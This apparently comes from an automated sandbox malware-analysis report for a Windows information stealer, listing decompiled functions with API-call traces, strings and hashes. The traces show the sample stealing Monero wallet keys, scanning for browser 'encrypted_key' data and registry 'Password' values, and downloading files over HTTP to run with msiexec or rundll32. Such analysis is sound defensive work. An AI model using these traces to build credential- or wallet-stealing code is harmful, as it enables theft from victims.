                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 4d6a71bf9ca276a633571df1f5bd1a51e82cd7119ae1d74dadb514cd6f195410
                        • Instruction ID: 9898c94f09cc993c22b0e17e39caa8963a36926e2e36d697b0dbfb2470df7dfa
                        • Opcode Fuzzy Hash: 4d6a71bf9ca276a633571df1f5bd1a51e82cd7119ae1d74dadb514cd6f195410
                        • Instruction Fuzzy Hash: FE12E0718001089ADB19FBA4DC92FDEB778FF54300F508169E51AA6199EF34AB4ACF53
                        Function 008752C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 00866280: InternetOpenA.WININET(00880DFE,00000001,00000000,00000000,00000000), ref: 008662E1
                          • Part of subcall function 00866280: StrCmpCA.SHLWAPI(?,0116ED88), ref: 00866303
                          • Part of subcall function 00866280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00866335
                          • Part of subcall function 00866280: HttpOpenRequestA.WININET(00000000,GET,?,0116E750,00000000,00000000,00400100,00000000), ref: 00866385
                          • Part of subcall function 00866280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008663BF
                          • Part of subcall function 00866280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008663D1
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00875318
                        • lstrlen.KERNEL32(00000000), ref: 0087532F
                          • Part of subcall function 00878E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00878E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00875364
                        • lstrlen.KERNEL32(00000000), ref: 00875383
                        • lstrlen.KERNEL32(00000000), ref: 008753AE
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 98f736806e4e6253e22fd68756b9da6f4171b28df0c997bf2db9d4b4327dd6b5
                        • Instruction ID: ba1d48de870bff2be0d247e3d5cfbd4ec25cfd20eae8704ddbf1f3290356fc03
                        • Opcode Fuzzy Hash: 98f736806e4e6253e22fd68756b9da6f4171b28df0c997bf2db9d4b4327dd6b5
                        • Instruction Fuzzy Hash: 2A51DA709101489ACB18EF68CD96AEE7779FF50341F508028E42EDA596DF34AB46CB53
                        Function 008712D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: e945fb20f26fc3274379ca6e8e6fe0bd649a3c12202bf7b14a7111b8081681fb
                        • Instruction ID: 11d3fa06d20e1bc9819b1d6dbbced605b5ba942122f42db95dea44232e6fad97
                        • Opcode Fuzzy Hash: e945fb20f26fc3274379ca6e8e6fe0bd649a3c12202bf7b14a7111b8081681fb
                        • Instruction Fuzzy Hash: B3C184B59001199BCB18EFA4DC89FEE7778FB64304F008598E51EA7185DB70EA85CF92
                        Function 00874280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00878DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00878E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 008742EC
                        • lstrcat.KERNEL32(?,0116E828), ref: 0087430B
                        • lstrcat.KERNEL32(?,?), ref: 0087431F
                        • lstrcat.KERNEL32(?,0116D980), ref: 00874333
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 00878D90: GetFileAttributesA.KERNEL32(00000000,?,00861B54,?,?,0088564C,?,?,00880E1F), ref: 00878D9F
                          • Part of subcall function 00869CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00869D39
                          • Part of subcall function 008699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008699EC
                          • Part of subcall function 008699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00869A11
                          • Part of subcall function 008699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00869A31
                          • Part of subcall function 008699C0: ReadFile.KERNEL32(000000FF,?,00000000,0086148F,00000000), ref: 00869A5A
                          • Part of subcall function 008699C0: LocalFree.KERNEL32(0086148F), ref: 00869A90
                          • Part of subcall function 008699C0: CloseHandle.KERNEL32(000000FF), ref: 00869A9A
                          • Part of subcall function 008793C0: GlobalAlloc.KERNEL32(00000000,008743DD,008743DD), ref: 008793D3
                        • StrStrA.SHLWAPI(?,0116E660), ref: 008743F3
                        • GlobalFree.KERNEL32(?), ref: 00874512
                          • Part of subcall function 00869AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869AEF
                          • Part of subcall function 00869AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00864EEE,00000000,?), ref: 00869B01
                          • Part of subcall function 00869AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869B2A
                          • Part of subcall function 00869AC0: LocalFree.KERNEL32(?,?,?,?,00864EEE,00000000,?), ref: 00869B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 008744A3
                        • StrCmpCA.SHLWAPI(?,008808D1), ref: 008744C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 008744D2
                        • lstrcat.KERNEL32(00000000,?), ref: 008744E5
                        • lstrcat.KERNEL32(00000000,00880FB8), ref: 008744F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: df8a5767654cbef8525e78299a3b6f17b12192387cd6eb3eda58ab5e5d06d03c
                        • Instruction ID: 640dcf3b6a0392d55427d04cbbb6e2f0e8f630e58ea4e38b7bda93dd0e63fa39
                        • Opcode Fuzzy Hash: df8a5767654cbef8525e78299a3b6f17b12192387cd6eb3eda58ab5e5d06d03c
                        • Instruction Fuzzy Hash: 66714476900208ABCB54EBE4DC89FEE77B9FB98300F048598E609D7185DB34DB45CB92
                        Function 00861310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008612A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008612B4
                          • Part of subcall function 008612A0: RtlAllocateHeap.NTDLL(00000000), ref: 008612BB
                          • Part of subcall function 008612A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008612D7
                          • Part of subcall function 008612A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008612F5
                          • Part of subcall function 008612A0: RegCloseKey.ADVAPI32(?), ref: 008612FF
                        • lstrcat.KERNEL32(?,00000000), ref: 0086134F
                        • lstrlen.KERNEL32(?), ref: 0086135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00861377
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 00878B60: GetSystemTime.KERNEL32(00880E1A,0116ABF8,008805AE,?,?,008613F9,?,0000001A,00880E1A,00000000,?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 00878B86
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00861465
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008699EC
                          • Part of subcall function 008699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00869A11
                          • Part of subcall function 008699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00869A31
                          • Part of subcall function 008699C0: ReadFile.KERNEL32(000000FF,?,00000000,0086148F,00000000), ref: 00869A5A
                          • Part of subcall function 008699C0: LocalFree.KERNEL32(0086148F), ref: 00869A90
                          • Part of subcall function 008699C0: CloseHandle.KERNEL32(000000FF), ref: 00869A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 008614EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: fc82f9c6a8819f4c2979ac9e0e5bc7e8ddff462014aba8073afb385931efac8a
                        • Instruction ID: 1018a76d8d9580ef1265ea9d8313caf31a8b8ba991befda3c1b57a7eaae96562
                        • Opcode Fuzzy Hash: fc82f9c6a8819f4c2979ac9e0e5bc7e8ddff462014aba8073afb385931efac8a
                        • Instruction Fuzzy Hash: B55132B191011957CB59EB64DC95BEE737CFB54300F4041A8B61AE2086EF309B85CBA7
                        Function 008675D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008672D0: memset.MSVCRT ref: 00867314
                          • Part of subcall function 008672D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0086733A
                          • Part of subcall function 008672D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008673B1
                          • Part of subcall function 008672D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0086740D
                          • Part of subcall function 008672D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00867452
                          • Part of subcall function 008672D0: HeapFree.KERNEL32(00000000), ref: 00867459
                        • lstrcat.KERNEL32(00000000,008817FC), ref: 00867606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00867648
                        • lstrcat.KERNEL32(00000000, : ), ref: 0086765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0086768F
                        • lstrcat.KERNEL32(00000000,00881804), ref: 008676A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 008676D3
                        • lstrcat.KERNEL32(00000000,00881808), ref: 008676ED
                        • task.LIBCPMTD ref: 008676FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: :
                        • API String ID: 3191641157-3653984579
                        • Opcode ID: 0d178cf2d6f0a5019a9f2a69cf2a3b8d89507d4cc464ade3e0b7ee2bbeee6389
                        • Instruction ID: 75cbb499d716a4d3b2951b7cf6444344bc681e8e3301b480ed5e8940405a53a0
                        • Opcode Fuzzy Hash: 0d178cf2d6f0a5019a9f2a69cf2a3b8d89507d4cc464ade3e0b7ee2bbeee6389
                        • Instruction Fuzzy Hash: FE314D7190010ADBCB48EBE8DC99DFE73B9FB69305B144118E106E7291DB38A947CB92
                        Function 008672D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 00867314
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0086733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008673B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0086740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00867452
                        • HeapFree.KERNEL32(00000000), ref: 00867459
                        • task.LIBCPMTD ref: 00867555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: Password
                        • API String ID: 2808661185-3434357891
                        • Opcode ID: e54acc2514a262698f71b919abc150f1850bf29c7e6875541e9c96d4db9d8317
                        • Instruction ID: 5bcd60b1637d85706441de930fc894363b3496ee83d1990a43ee946ebfe68819
                        • Opcode Fuzzy Hash: e54acc2514a262698f71b919abc150f1850bf29c7e6875541e9c96d4db9d8317
                        • Instruction Fuzzy Hash: 93614CB180412C9BDB24DB54CC55BDAB7B8FF58304F0081E9E689A6281EF705BC9CFA1
                        Function 00878100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0116E438,00000000,?,00880E2C,00000000,?,00000000), ref: 00878130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00878137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00878158
                        • __aulldiv.LIBCMT ref: 00878172
                        • __aulldiv.LIBCMT ref: 00878180
                        • wsprintfA.USER32 ref: 008781AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: 59a0aff504a9b73450a88e27f029f78a283c1ec54edec811f3b6da4b319ea8fc
                        • Instruction ID: 17bb6f783170639f50fa9e3e81ffdead94f0a0093671af3f3a8166058ac8c15b
                        • Opcode Fuzzy Hash: 59a0aff504a9b73450a88e27f029f78a283c1ec54edec811f3b6da4b319ea8fc
                        • Instruction Fuzzy Hash: 93210BB1E44319ABDB00DFD4CC49FAEB7B8FB44B14F108519F619BB284D778A9018BA5
                        Function 008660A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00864839
                          • Part of subcall function 008647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00864849
                        • InternetOpenA.WININET(00880DF7,00000001,00000000,00000000,00000000), ref: 0086610F
                        • StrCmpCA.SHLWAPI(?,0116ED88), ref: 00866147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0086618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008661B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 008661DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0086620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00866249
                        • InternetCloseHandle.WININET(?), ref: 00866253
                        • InternetCloseHandle.WININET(00000000), ref: 00866260
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
